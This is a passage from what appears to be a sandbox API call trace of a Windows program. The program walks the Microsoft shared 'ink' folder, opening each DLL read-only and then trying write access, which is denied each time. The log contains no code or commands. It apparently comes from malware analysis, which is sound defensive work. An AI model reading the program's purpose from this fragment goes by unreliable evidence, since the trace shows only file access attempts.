shared\\ink\\TipRes.dll", lpUsedDefaultChar=0x0) returned 62 [0085.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0085.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0085.796] AreFileApisANSI () returned 1 [0085.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0085.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ebe0 [0085.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll") returned 62 [0085.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0085.797] GetFileType (hFile=0x35c) returned 0x1 [0085.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0085.797] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.798] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.798] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.798] CloseHandle (hObject=0x35c) returned 1 [0085.798] AreFileApisANSI () returned 1 [0085.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0085.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6eb58 [0085.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll") returned 62 [0085.798] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.798] GetLastError () returned 0x5 [0085.798] GetLastError () returned 0x5 [0085.798] SetLastError (dwErrCode=0x5) [0085.798] GetLastError () returned 0x5 [0085.798] SetLastError (dwErrCode=0x5) [0085.798] GetLastError () returned 0x5 [0085.798] SetLastError (dwErrCode=0x5) [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0085.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.799] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5600, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="tipresx.dll", cAlternateFileName="")) returned 1 [0085.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0085.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0085.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0085.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0085.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0085.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0085.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0085.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0085.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0085.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.800] AreFileApisANSI () returned 1 [0085.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll", lpUsedDefaultChar=0x0) returned 63 [0085.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0085.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0085.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0085.800] AreFileApisANSI () returned 1 [0085.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0085.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e4f8 [0085.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6e4f8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll") returned 63 [0085.800] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0085.800] GetFileType (hFile=0x35c) returned 0x1 [0085.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0085.800] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.801] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.801] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.801] CloseHandle (hObject=0x35c) returned 1 [0085.801] AreFileApisANSI () returned 1 [0085.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0085.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e030 [0085.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x538c8, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll") returned 63 [0085.801] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.801] GetLastError () returned 0x5 [0085.801] GetLastError () returned 0x5 [0085.801] SetLastError (dwErrCode=0x5) [0085.801] GetLastError () returned 0x5 [0085.801] SetLastError (dwErrCode=0x5) [0085.801] GetLastError () returned 0x5 [0085.802] SetLastError (dwErrCode=0x5) [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0085.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.802] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79680792, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x79680792, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x79680792, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="tipskins.dll", cAlternateFileName="")) returned 1 [0085.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0085.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0085.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f0b8 [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0085.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0085.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0085.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.803] AreFileApisANSI () returned 1 [0085.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll", lpUsedDefaultChar=0x0) returned 64 [0085.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0085.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0085.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0085.803] AreFileApisANSI () returned 1 [0085.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0085.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0085.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6e140, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll") returned 64 [0085.803] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipskins.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0085.803] GetFileType (hFile=0x35c) returned 0x1 [0085.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0085.803] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.804] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.804] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.804] CloseHandle (hObject=0x35c) returned 1 [0085.804] AreFileApisANSI () returned 1 [0085.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0085.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0085.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x6df20, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll") returned 64 [0085.804] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipskins.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipskins.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.805] GetLastError () returned 0x5 [0085.805] GetLastError () returned 0x5 [0085.805] SetLastError (dwErrCode=0x5) [0085.805] GetLastError () returned 0x5 [0085.805] SetLastError (dwErrCode=0x5) [0085.805] GetLastError () returned 0x5 [0085.805] SetLastError (dwErrCode=0x5) [0085.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0085.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0085.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.805] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7965a52d, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x7965a52d, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x7965a52d, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x9e1a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="tiptsf.dll", cAlternateFileName="")) returned 1 [0085.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0085.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0085.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0085.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0085.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0085.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0085.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0085.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0085.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0085.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0085.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.806] AreFileApisANSI () returned 1 [0085.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll", lpUsedDefaultChar=0x0) returned 62 [0085.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0085.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.806] 